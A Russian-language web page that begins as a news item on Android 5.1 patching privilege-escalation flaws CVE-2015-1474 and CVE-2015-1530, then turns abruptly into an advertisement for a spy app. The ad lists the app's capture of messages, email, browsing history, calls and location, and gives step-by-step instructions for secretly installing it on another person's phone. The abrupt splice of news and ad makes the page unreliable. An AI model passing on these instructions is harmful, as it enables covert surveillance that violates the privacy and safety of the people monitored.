В Android 5.1 исправлены критические уязвимости

694408aae4e7d7e0328a36cc9dc27250

Корпорация Google произвела исправление уязвимостей, присутствовавших в прошлой версии ОС Android. В частности, речь идёт об обновлении Android 5.1 Lollipop, в котором устраняется возможность назначать привилегии суперпользователя программам, которые могли выполнять фоновые задачи в незаметном для пользователя режиме. Бреши были обнаружены китайским специалистом по Интернет безопасности из компании Qihoo 360, о чём он тут же сообщил в Google.

Первая известная уязвимость — CVE-2015-1474. Она способствует циклическому переполнению буфера памяти, в результате чего код приложения может выполняться некорректно. Это приводит к тому, что стороння программа легко получает административные привилегии. Особенно характерно для телефонов, где режим Root-пользователя уже разблокирован и настроен. Обычно каждый софт запрашивает разрешение пользователя, но иногда подобные действия в версиях ниже 5.1 могли происходить совершенно спонтанно.

Следующая важная брешь — CVE-2015-1530. Связывают её с переполнением буфера в Play Market. Бывали ситуации, в которых приложение в момент установки вызывало перегрузку памяти, повышая себе привилегии до самого высокого уровня. Гипотетически это могло бы вызвать полный крах системы, а также взлом любой информации в памяти устройства, которая затем могла бы быть передана по Интернету третьим лицам. О реальных случаях использования такой бреши не сообщается.

Когда в систему Android происходит установка любой программы, ОС всегда запрашивает у владельца устройства, какие именно права могут разрешаться приложению. Порой происходила ошибка, в результате чего настройка привилегий работала некорректно. Как отмечает специалист по безопасности, многие случаи воровства банковских реквизитов и паролей от социальных сетей могли быть напрямую связаны с подобным поведением Android. Сотрудники Google оперативно выпустили исправление, однако от комментариев отказывались.

Среди действий, которые могли бы совершать вредоносные программы втайне от пользователя, отмечается возможность передачи файлов на удалённый сервер (в том числе и фотографий, отснятых при помощи мобильной камеры), отправка коротких сообщений SMS, совершение звонков на платные телефонные номера и тому подобное. Для бреши CVE-2015-1474 корпорации Google пришлось выпустить сразу две заплатки, поскольку первый патч прошивки не устранял проблему окончательно.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.